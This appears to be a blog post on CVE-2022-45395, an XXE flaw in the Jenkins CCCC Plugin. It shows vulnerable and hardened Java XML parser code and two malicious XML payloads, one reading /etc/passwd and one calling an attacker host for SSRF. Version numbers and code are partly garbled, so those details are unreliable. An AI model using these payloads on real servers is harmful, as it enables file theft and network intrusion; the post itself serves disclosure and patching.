In late 2022, security researchers uncovered a concerning vulnerability — CVE-2022-45395 — in the Jenkins CCCC Plugin, version .6 and earlier. This flaw lets attackers exploit XML files to read server files or conduct network attacks, thanks to improper settings in its XML parser.
In this post, we’ll break down what the bug is, how it works, and how to test it with code examples. If you run Jenkins and use the CCCC Plugin, you need to know about this!
What Is the Jenkins CCCC Plugin?
Jenkins is a popular open-source tool to automate building and deploying code. The CCCC Plugin (C and C++ Code Counter) collects C/C++ code metrics and presents them as part of the Jenkins build report. It parses CCCC XML output files when jobs run.
The Vulnerability: XML External Entity (XXE)
When Jenkins uses the CCCC Plugin to parse code reports in XML files, it uses an XML parser. If the parser isn’t told to block “external entities” (<!ENTITY ...>), attackers can upload evil XML files that make the server read sensitive files or call attacker-controlled servers.
CVE-2022-45395 states
> Jenkins CCCC Plugin .6 and earlier does not configure its XML parser to prevent XML External Entity (XXE) attacks.
Source:
- Original Jenkins Security Advisory
- NVD CVE Description
Insecure XML parsing often looks like this in Java
// Insecure XML parsing: vulnerable to XXE
FileInputStream fis = new FileInputStream("report.xml");
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(fis);
Safe code should disable external entities
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true);
factory.setFeature("http://xml.org/sax/features/external-general-entities";, false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities";, false);
DocumentBuilder builder = factory.newDocumentBuilder();
Exploit Scenario
Let’s say you are allowed to upload CCCC XML reports via Jenkins web UI (which is common for build automation).
If Jenkins runs the vulnerable plugin, and you upload a malicious XML file, you can
- Read arbitrary files (like /etc/passwd on Linux or C:\windows\win.ini on Windows)
Example malicious XML file (reads /etc/passwd)
<?xml version="1." encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<cccc_metrics>
<summary>
<total>&xxe;</total>
</summary>
</cccc_metrics>
If the Jenkins plugin processes this XML, it’ll insert the contents of /etc/passwd in the build results!
Example for SSRF (calls remote server)
<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://evil-attacker.com/xxe.txt">;
]>
<cccc_metrics>
<summary>
<total>&xxe;</total>
</summary>
</cccc_metrics>
Now Jenkins will try to load a file from the attacker’s server, exposing information or being used as a “pivot” into private networks.
Browse the job report page or download artifacts.
4. You might see sensitive data like /etc/passwd or data from a protected network.
Upgrade the CCCC Plugin past version .6, or patch it if you maintain a fork.
- Apply Jenkins Security Updates regularly. See Jenkins Security Advisory 2022-11-15.
References & Further Reading
- CVE-2022-45395 on NVD
- Jenkins CCCC Plugin
- OWASP XXE Guide
- Jenkins Security Advisories
Closing Thoughts
CVE-2022-45395 is a classic example of why secure parsing is crucial when working with XML. If you use Jenkins and especially accept user input as XML files, this is a *must fix* — attacker-supplied XML can compromise your whole server.
Stay safe and stay updated! If you need more help with Jenkins or secure CI/CD, check the links above and keep your dependencies fresh.
Timeline
Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/20/2022 03:02:00 UTC